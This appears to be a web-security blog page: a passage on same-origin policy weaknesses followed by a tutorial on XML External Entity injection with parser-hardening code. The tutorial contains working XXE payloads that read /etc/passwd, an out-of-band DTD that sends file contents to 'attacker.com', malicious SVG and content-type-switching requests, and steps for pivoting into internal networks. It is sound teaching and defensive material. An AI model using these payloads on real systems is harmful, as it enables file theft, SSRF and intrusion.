Firstly, the document.domain mechanism functions as a security tarpit: once any two legitimate subdomains in example.com, e.g. www.example.com and payments.example.com, choose to cooperate this way, any other resource in that domain, such as user-pages.example.com, may then set own document.domain likewise, and arbitrarily mess with payments.example.com. This means that in many scenarios, document.domain may not be used safely at all.
Whenever document.domain cannot be used - either because pages live in completely different domains, or because of the aforementioned security problem - legitimate client-side communication between, for example, embeddable page gadgets, is completely forbidden in theory, and in practice very difficult to arrange, requiring developers to resort to the abuse of known browser bugs, or to latency-expensive server-side channels, in order to build legitimate web applications.
Whenever tight integration of services within a single host name is pursued to overcome these communication problems, because of the inflexibility of same-origin checks, there is no usable method to sandbox any untrusted or particularly vulnerable content to minimize the impact of security problems.

On top of this, the specification is simplistic enough to actually omit quite a few corner cases; among other things:

The document.domain behavior when hosts are addressed by IP addresses, as opposed to fully-qualified domain names, is not specified.
The document.domain behavior with extremely vague specifications (e.g., com or co.uk) is not specified.
The algorithms of context inheritance for pseudo-protocol windows, such as about:blank, are not specified.
The behavior for URLs that do not meaningfully have a host name associated with them (e.g., file://) is not defined, causing some browsers to permit locally saved files to access every document on the disk or on the web; users are generally not aware of this risk, potentially exposing themselves.
The behavior when a single name resolves to vastly different IP addresses (for example, one on an internal network, and another on the Internet) is not specified, permitting DNS rebinding attacks and related tricks that put certain mechanisms (captchas, ad click tracking, etc) at extra risk.
Many one-off exceptions to the model were historically made to permit certain types of desirable interaction, such as the ability to point own frames or script-spawned windows to new locations - and these are not well-documented.

All this ambiguity leads to a significant degree of variation between browsers, and historically, resulted in a large number of browser security flaws. A detailed analysis of DOM actions permitted across domains, as well as context inheritance rules, is given in later sections. A quick survey of several core same-origin differences between browsers is given below:

Note: Firefox 3 is currently the only browser that uses a directory-based scoping scheme for same-origin access within file://. This bears some risk of breaking quirky local applications, and may not offer protection for shared download directories, but is a sensible approach otherwise.
Corner cases and exceptions

The behavior of same-origin checks and related mechanisms is not well-defined in a number of corner cases, such as for protocols that do not have a clearly defined host name or port associated with their URLs (file:, data:, etc.). This historically caused a fair number of security problems, such as the generally undesirable ability of any locally stored HTML file to access all other files on the disk, or communicate with any site on the Internet.

In addition, many legacy cross-domain operations predating JavaScript are not subjected to same-origin checks; one such example is the ability to include scripts across domains, or submit POST forms. Lastly, certain types of attacks, such as DNS rebinding or server-side proxies, permit the host name check to be partly subverted, and make it possible for rogue web pages to directly interact with sites through addresses other than their "true", canonical origin. The impact of such attacks is limited to very specific scenarios, since the browser still believes that it is interacting with the attacker's site, and therefore does not disclose third-party cookies or other sensitive information to the attacker.

Workarounds

To enable developers to, in a controlled manner, circumvent the same origin policy, a number of "hacks" such as using the fragment identifier or the window.name property have been used to pass data between documents residing in different domains. With the HTML5 standard, a method was formalized for this: the postMessage interface, which is only available on recent browsers. JSONP and cross-origin resource sharing can also be used to enable ajax-like calls to other domains. easyXDM can also be used to easily work around the limitation set in place by the Same Origin Policy. It is a light weight, easy to use and self contained Javascript library that makes it easy for developers to communicate and expose javascript API's across domain boundaries.

Reference:

14/03/2012

Infiltrating corporate networks using XXE injection

XML External Entity (XXE) Injection — Updated 2026

XML External Entity (XXE) Injection

DTD Abuse // File Disclosure // Blind OOB Exfiltration // SSRF via XML

XXE CWE-611 A5:2021 SSRF Blind OOB Updated 2026

Intro

External entity injection is generally speaking a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromises the security of a web application. This type of attack is well documented and known since 2002, though it continues to appear in modern applications — particularly in SOAP services, file upload handlers, and legacy enterprise integrations.

Taxonomy (2026): XXE was categorized as OWASP A4:2017 — XXE (its own dedicated category). In OWASP Top 10 2021, it was merged into A5:2021 — Security Misconfiguration. The primary CWE is CWE-611 (Improper Restriction of XML External Entity Reference). Also relevant: CWE-827 (Improper Control of Document Type Definition).

XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.

An XXE attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections — allowing embedding of data outside the main file into an XML document. A successful XXE injection attack could allow an attacker to access operating system files, cause a DoS attack, perform SSRF, or in certain conditions inject JavaScript (performing an XSS attack).

How the XML parser works

Based on W3C Recommendation — Extensible Markup Language (XML) 1.0, Fifth Edition

When an XML processor recognizes a reference to a parsed entity, in order to validate the document, the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity.

This rule is based on the recognition that the automatic inclusion provided by the SGML and XML entity mechanism, primarily designed to support modularity in authoring, is not necessarily appropriate for other applications, in particular document browsing. Browsers, for example, when encountering an external parsed entity reference, might choose to provide a visual indication of the entity's presence and retrieve it for display only on demand.

When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.

How the XML parser handles XXEs

An XXE is meant to be converted to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article, or a processing instruction defined by a particular application specification, relative URIs are relative to the location of the resource within which the entity declaration occurs.

This is defined to be the external entity containing the < which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).

Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference.

In the absence of additional information outside the scope of this specification within the resource, the base URI of a resource is always the URI of the actual resource returned. In other words, it is the URI of the resource retrieved after all redirection has occurred.

Figure 1 — XXE attack flow: from malicious DTD to data exfiltration

An actual example of XXE

Based on what is already explained about how the XML parser handles XXE, in the following example the XML document will make an XML parser read /etc/passwd and expand it into the content of the PutMeHere tag:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE PutMeHere [
  <!ELEMENT PutMeHere ANY>
  <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<PutMeHere>&xxe;</PutMeHere>

See how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the PutMeHere tag will be the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser, the passwd file contents will be loaded and returned.

Note: The XML document is not valid if the &xxe; reference does not start with the & character and terminate with the ; character. The attack is limited to files containing text that the XML parser will allow at the place where the external entity is referenced. Files containing non-printable characters, and files with randomly located less-than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.

Identifying XXE attack strings

The following table contains attack strings that can help someone break the XML schema and cause the XML parser to return possibly verbose errors, helping you identify the XML structures.

#	Payload	Purpose
1	'	Single quote — break attribute values
2	''	Double single quote
3	"	Double quote — break attribute values
4	""	Double double quote
5	<	Open tag — trigger parser error
6	>	Close tag
7	]]>	CDATA end — premature closure
8	]]>>	Malformed CDATA end
9	<!--/-->	Malformed comment
10	/-->	Partial comment close
11	-->	Comment close without open
12	<!--	Comment open without close
13	<!	Incomplete declaration
14	<![CDATA[ / ]]>	CDATA section — bypass parsing

CDATA sections: <![CDATA[ / ]]> — CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. Characters enclosed in a CDATA section are not parsed by the XML parser.

Exploiting XXE vulnerabilities

Let's suppose there is a web application using XML-style communication to perform user login. This is done by creating and adding a new <user> node on an XML database file. We will try to inject XML that breaks the schema. Some or all of the following attempts will generate an XML error, helping us understand the XML schema.

Valid XML request

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1</username>
  <credentials>pass1</credentials>
</user>

Example 1 — angle bracket injection

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1<</username>
  <credentials>pass1</credentials>
</user>

Example 2 — malformed comment injection

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1<--<</username>
  <credentials>pass1</credentials>
</user>

Example 3 — closing angle bracket

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1></username>
  <credentials>pass1</credentials>
</user>

Example 4 — comment injection

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1<!--/--></username>
  <credentials>pass1</credentials>
</user>

Injecting <!-- after the username causes the parser to interpret everything after it as a comment, potentially consuming the closing tag and credentials field — generating an informative error message that reveals schema structure.

Example 5 — CDATA injection

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1 <![CDATA[ / ]]> </username>
  <credentials>pass1</credentials>
</user>

Example 6 — XSS via CDATA

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></username>
  <credentials>pass1</credentials>
</user>

When the XML document is parsed, the CDATA delimiters are eliminated, reconstructing a <script> tag. If the tag contents are reflected in an HTML page, XSS is achieved.

A real attack scenario

XXE attacks can result in OS file read access, similar to a path traversal attack. Consider a sophisticated e-banking application that uses the browser as a thin client, consuming a web service after successful login. The transaction XML message carries the username and password back and forth alongside the transaction data.

Client request — legitimate transaction

<?xml version="1.0" encoding="ISO-8859-7"?>
<appname>
  <header>
    <principal>username1</principal>
    <credential>userpass1</credential>
  </header>
  <fixedPaymentsDebitRequest>
    <fixedPayment organizationId="44" productId="61"
      clientId="33333333" paymentId="3"
      referenceDate="2008-05-12" paymentDate="20-11-25">
      <amount currency="EUR">100,1</amount>
      <transactionId>1111111</transactionId>
      <description>customer description</description>
    </fixedPayment>
  </fixedPaymentsDebitRequest>
</appname>

Client request — with XXE injection

<?xml version="1.0" encoding="ISO-8859-7"?>
<!DOCTYPE foo [<!ENTITY xxefca0a SYSTEM "file:///etc/passwd"> ]>
<appname>
  <header>
    <principal>username1&xxefca0a;</principal>
    <credential>userpass1</credential>
  </header>
  <fixedPaymentsDebitRequest>
    ...
  </fixedPaymentsDebitRequest>
</appname>

The &xxefca0a; entity reference in the <principal> tag causes the parser to read /etc/passwd and embed its contents into the XML. The server response — whether a success or error message — will contain the file contents concatenated with the username.

Server response — file contents exfiltrated

HTTP/1.1 400 Bad Request
...error message containing...
username1root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
...
jboss:x:101:101:JBossAS:/usr/share/jbossas:/bin/sh
Server: Apache/x.x (Red Hat)
Content-Type: text/html;charset=ISO-8859-1

Figure 2 — XXE escalation: from file read to full internal network pivot

The next step after initial file exfiltration would be to map the outbound local firewall rules to see what traffic is allowed to go out. Download the /etc/hosts file of the compromised web server, then start forwarding traffic to identified internal machines. As soon as you get a response back, you know that the specific machine is actively responding. Then rotate through all ports to identify which services are accessible. This maps the egress filtering done by the application server's local firewall.

After mapping the firewall rules, the next step would be to fingerprint surrounding web servers using DirBuster directory lists, or further escalate using HTTPS to fingerprint based on SSL/TLS error responses, and then deliver payloads or perform path traversal / SQL injection attacks through the XML parser.

What can you do with a successful XXE attack

Use the application as a proxy, retrieving sensitive content from any web servers the application can reach, including those on private non-routable address space.
Exploit vulnerabilities on back-end web applications, provided they can be exploited via URIs (directory brute-forcing, SQL injection, path traversal, etc.).
Test for open ports on back-end systems by cycling through IP addresses and port numbers. Timing differences can be used to infer the state of requested ports. Service banners may appear in application responses.
Map firewall rules on other company extranets.
DoS internal company web server machines (e.g. requesting /dev/random or recursive entity expansion — the "Billion Laughs" attack).
Hide port scans by mixing them with the vulnerable web server's legitimate traffic.
Access cloud metadata endpoints to steal IAM credentials (AWS, GCP, Azure).
Connect to internal services like syslog daemons, proxy admin panels, or unprotected file shares via UNC paths.
Launch blind SQL injection attacks through the parser against surrounding database servers.

Modern attack vectors New 2026

Blind XXE via out-of-band (OOB) exfiltration

When the application does not return the parsed entity content in its response (no direct output), blind XXE via OOB channels can still exfiltrate data. The technique uses parameter entities to load an external DTD from an attacker-controlled server, which in turn constructs a URL containing the target file's contents and forces the parser to request it.

# Malicious payload sent to the application:
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root>test</root>

# Contents of evil.dtd hosted on attacker.com:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM
  'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

The parser loads the external DTD, reads the target file into the %file; parameter entity, constructs a URL containing the file data, and makes an HTTP request to the attacker's server — exfiltrating the data in the URL query string. This works even when no XML output is reflected to the attacker.

Figure 3 — Blind XXE via out-of-band (OOB) data exfiltration

XXE via file upload

Many common file formats are XML-based internally. Uploading a malicious file in one of these formats can trigger XXE processing even when the application doesn't appear to accept XML input:

SVG images — SVG is XML. A malicious SVG with an XXE payload can trigger when the server processes the image (thumbnail generation, rendering, metadata extraction).
DOCX / XLSX / PPTX — Microsoft Office Open XML formats are ZIP archives containing XML files. Replacing [Content_Types].xml or other internal XML files with XXE payloads can trigger the vulnerability when the server parses the document.
SOAP endpoints — SOAP is inherently XML-based. DTD declarations injected into SOAP envelopes are frequently processed by the underlying XML parser.

# Malicious SVG file (upload as profile picture, etc.):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text x="0" y="20">&xxe;</text>
</svg>

Content-type switching (JSON to XML)

Some application frameworks accept both JSON and XML based on the Content-Type header. If an API endpoint normally expects JSON, switching the Content-Type to application/xml or text/xml may cause the server to route the body through an XML parser — even if the developers never intended to accept XML input. This is particularly common with Java-based REST frameworks (JAX-RS, Spring MVC).

# Original JSON request:
POST /api/login HTTP/1.1
Content-Type: application/json

{"username": "admin", "password": "test"}

# Switched to XML with XXE:
POST /api/login HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
  <username>&xxe;</username>
  <password>test</password>
</root>

Mitigation of XXE vulnerabilities Updated

The primary defense is to disable DTD processing and external entity resolution in your XML parser. The exact configuration varies by language and library:

Java (DocumentBuilderFactory)

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

// Disable DTDs entirely (most secure)
dbf.setFeature(
  "http://apache.org/xml/features/disallow-doctype-decl", true);

// If DTDs can't be disabled, at minimum disable external entities
dbf.setFeature(
  "http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature(
  "http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature(
  "http://apache.org/xml/features/nonvalidating/load-external-dtd",
  false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

Python (lxml / defusedxml)

# Use defusedxml — drop-in replacement that blocks XXE by default
import defusedxml.ElementTree as ET
tree = ET.parse('input.xml')

# Or with lxml, disable network access and entity resolution
from lxml import etree
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    dtd_validation=False,
    load_dtd=False
)

.NET (XmlReaderSettings)

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

XmlReader reader = XmlReader.Create(stream, settings);

PHP (libxml)

// Disable entity loading before any XML parsing
libxml_disable_entity_loader(true);

// For SimpleXML:
$xml = simplexml_load_string($data, 'SimpleXMLElement',
    LIBXML_NOENT | LIBXML_NONET);

Important: libxml_disable_entity_loader() is deprecated in PHP 8.0+ because libxml2 >= 2.9.0 disables external entity loading by default. However, always verify your specific PHP and libxml2 versions — older deployments may still be vulnerable.

General hardening principles

Disable DTD processing entirely — this is the most effective defense. If your application doesn't need DTD validation (and almost none do), disable the DOCTYPE declaration completely.
Use allowlists for external entity URIs — if external entities are genuinely needed, restrict them to known-good URIs only.
Validate Content-Type headers — reject XML content types on endpoints that should only accept JSON. This blocks content-type switching attacks.
Scan uploaded files — inspect DOCX, XLSX, SVG, and other XML-based file formats for DTD declarations before processing them.
Apply network-level controls — even if XXE is exploited, egress filtering, IMDSv2 enforcement, and network segmentation limit the blast radius.
Use SAST tools — static analysis can identify insecure XML parser configurations. Tools like Semgrep have built-in rules for XXE detection across multiple languages.

Summary

When an application is vulnerable to XXE, the attacker may be capable of gaining access to the web server OS file system, causing DoS attacks (via /dev/random or recursive entity expansion), performing SSRF against internal services, exfiltrating data via out-of-band channels, or even achieving XSS through XML-to-HTML reflection. Modern XXE often comes through non-obvious vectors: SVG uploads, Office documents, SOAP endpoints, and content-type switching on REST APIs.